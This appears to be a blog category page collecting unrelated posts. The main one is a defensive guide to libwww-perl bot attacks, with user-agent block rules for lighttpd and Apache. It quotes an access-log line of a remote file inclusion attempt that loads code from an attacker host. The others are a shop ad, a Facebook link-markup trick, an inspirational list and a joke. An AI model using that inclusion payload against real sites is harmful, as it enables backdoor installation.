Category: Internet

All Internet related works will be listed here..

The rise of bots, spammers, crack attacks and libwww-perl

[dfads params=’groups=-1′]

libwww-perl (LWP) is fine WWW client/server library for Perl. Unfortunately this library used by many script kiddy, crackers, and spam bots.

Verify bots…

Following is a typical example, you will find in your apache or lighttpd access.log log file:

$ grep ‘libwww-perl’ access.log

OR

$ grep ‘libwww-perl’ /var/log/lighttpd/access.log

Output:

62.152.64.210 www.domain.com - [23/Oct/2006:22:24:37 +0000] "GET /wamp_dir/setup/yesno.phtml?no_url=http://www.someattackersite.com/list.txt? HTTP/1.1" 200 72672 "-" "libwww-perl/5.76"

So someone is trying to attack your host and exploit security by installing a backdoor. yesno.phtml is poorly written application and it can run or include php code (list.txt) from remote server. This code install perl based backdoor in /tmp or /dev/shm and send notification to IRC server or bot master i.e. server is ready for attack against other computer. This back door can flood or DDoS other victims server (it will also cost you tons of bandwidth). Usually attacker will hide himself behind zombie machines. Blocking by user agent can help and in some cases problem can be dropped all together.

You will also notice that libwww-perl/5.76 as browser name (read as useragent). To avoid such attack:
=> Block all libwww-perl useragent
=> Run web server in chrooted jail

How to block libwww-perl under Lighttpd web server?

Open lighttpd.conf file:
# vi /etc/lighttpd/lighttpd.conf
Append following line to main server or virtual hosting section:
$HTTP["useragent"] =~ "libwww-perl" {
url.access-deny = ( "" )
}

Save and close the file. Restart the lighttpd:
# /etc/init.d/lighttpd restart

How to block libwww-perl under Apache web server?

Use mod_rewrite and .htaccess file to block user agent libwww-perl. Open your .htaccess file and add rule as follows:
SetEnvIfNoCase User-Agent "^libwww-perl*" block_bad_bots
Deny from env=block_bad_bots

How do I verify that User-Agent libwww-perl is blocked?

Download this perl script on your own workstation. Replace http://your-website.com/ with your site name:
$req = HTTP::Request->new(GET => 'http://your-website.com/');
Save and execute perl script:
$ chmod +x test-lwp.pl
$ ./test-lwp.pl
Output:

Error: 403 Forbidden

You should see 403 Forbidden error as your user-agent is blocked by server configuration.

Please note that blocking by user agent can help, but spammers spoof user agents. My personal experience shows that blocking libwww-perl saves bandwidth and drops potential threats by 50-80%.

Another highly recommended solution is to run web server in chrooted jail. In chrooted jail attacker cannot install backdoor as shell and utilities such as wget not available to download the perl code. I also recommend blocking all outgoing http/ftp request from your webserver using iptables or use hardware based firewall such as Cisco ASA Firewalls.

Final extreme solution is to put entire root file system on read only media such as CDROM (or use live CD). No attacker can bring down your web server if it is serving pages from read only media (except DoS/DDoS attack).

What do you think? How do you block such attacks? Please share your nifty technique with us.

 

[source 1=”http://www.cyberciti.biz” language=”:”][/source]
[dfads params=’groups=-1′]

Muzikal India – That sells Musical Instruments online

MuzikalIndia is an e-commerce web portal that runs on both Personal Computers & Hand Held Devices. Our product sells musical instruments to customers online. We aim to help low capitalized musical stores to create an online presence. Our targetted customers are students, musicians/bands/orchestras, music schools, etc..
Most of the online musical stores in India are owned by highly capitalized stores. These stores cater only to some of the metro cities like Bangalore, Chennai, Mumbai. Low capitalized musical stores are lagging back on online presence. Thus, by sorting out these problems we came up with a solution called muzikalindia.com. This helps small musical stores to present their musical instruments on our portal. On the other hand, customers will also be benefited. They will get multiple options of stores and products before choosing a product, thus, saving time of purchase and research.

Muzikal india also promises to provide tutors for beginners to start their campaign. It has its own blog called blog.muzikalindia.com which helps users to learn instruments online. The blog also provides various information regarding musical instruments, news, events, etc.

Buy Musical instruments online from http://muzikalindia.com

Regards
Team MuzikalIndia

Post a hyperlink on Facebook Wall Post

[dfads params=’groups=-1′]

Hello Friends, after an hour spending in search of the topic I finally found a way via which we can add hyperlinks in our facebook status. Check them out.

Method 1.Copy & paste the code below on your facebook wall post. Replace the text “Click here to view the ubliest profile ever” to your own.

@[1: ]@@[1:[0:1: Click here to view the ugliest profile ever! ]]

Method 2. Modify the code below as following.

PROFILE_ID: Your Profile Id i.e. 100002925714087 as of mine

CUSTOM_TEXT: Text you want to make visible

@@[0:[PROFILE_ID:1:CUSTOM_TEXT]]
@[PROFILE_ID:0]

Thanks

Dev

[Source: http://www.doncaprio.com/2011/11/embed-custom-link-facebook-status.html]

[dfads params=’groups=-1′]

1 MIN reading: I have learned

[dfads params=’groups=-1′]

(This text, which I found on the Internet, is attributed to me . I did not write it, but I think worth reproducing here)

I’ve learned that you cannot make someone love you. All you can do is be someone who can be loved. The rest is up to them;
I’ve learned that no matter how much I care, some people just don’t care back;
I’ve learned that it takes years to build up trust, and only seconds to destroy it.
I’ve learned that you can get by on charm, for about fifteen minutes. After that, you’d better know something;
I’ve learned that either you control your attitude or it controls you.
I’ve learned that no matter how hot and steamy a relationship is at first, the passion fades and there had better be something else to take it’s place.
I’ve learned that sometimes the people you expect to kick you when you’re downhill are the ones to help you get back up.
I’ve learned that sometimes when I’m angry I have the right to be angry.
I’ve learned that true friendship continues to grow, even over the longest distance. Same goes for true love.
I’ve learned that just because someone doesn’t love you the way you want them to doesn’t mean that they don’t love you with all they have.
I’ve learned that maturity had more to do with what types of experiences you’ve had and what you’ve learned from them and less to do with how many birthdays you’ve celebrated.
I’ve learned that your family won’t always be there for you.
I’ve learned that no matter how good a friend is, they’re going to hurt you every once in a while.
I’ve learned that it isn’t always enough to be forgiven by others. Sometimes you have to forgive yourself.
I’ve learned that no matter how bad your heart is broken, the world doesn’t stop for your grief.
I’ve learned that our background and circumstances may have influenced who we are, but we are responsible for who we become.
I’ve learned that just because two people argue, it doesn’t mean they don’t love each other. And just because they don’t argue, it doesn’t mean they do.
I’ve learned that we don’t have to change friends if we understand that friends change.
I’ve learned that two people can look at the exact same thing and see something totally different.
I’ve learned that no matter how you try to protect your children, they will eventually get hurt and you will get hurt in the process.
I’ve learned that your life can be changed in a matter of hours by people who don’t even know you.
I’ve learned that it’s hard to determine where to draw the line between being nice and not hurting people’s feelings and standing up for what you believe.

[dfads params=’groups=-1′]

The Truth About Man

[dfads params=’groups=-1′]

One day in the GArden of Eden, Eve calls out to God. “Lord, I have a problem!” “Whats’ the problem, Eve?” “Lord, I know you created me and provided this beautiful garden and all of these wonderful animals and that hilarious comedic snake, but I’m just not happy.” “Why is that, Eve” came the reply from the above. “Lord, I am lonely, and I’m sick to death of apples.” “Well Eve, in that case, I have a solution. I shall create a man for you.” “What’s a man, Lord?”

“This man will be a flawed creature, with many bad traits. He’ll lie, cheat, and be vainglorious; all in all, he’ll give you a hard time. But… he’ll be bigger, faster, and will like to hunt and kill things. He will look silly when he’s aroused, but since you’ve been complaining, I’ll create him in such a way that he will satisfy your physical needs.” He will be witless and will revel in childish things like fighting and kicking a ball about.

“He wont’ be too smart, so he’ll also need your advice to think properly.”

“Sounds great.” says, Eve, with an ironically raised eyebrow. What’s the catch, Lord?” “Well, you can have him on one condition.” “What’s that, Lord?” “As I said, he’ll be proud, arrogant, and self-adminiring… So you’ll have to let him believe that I made him first. But remember, it’s our little secret… You know, woman to woman.”

[dfads params=’groups=-1′]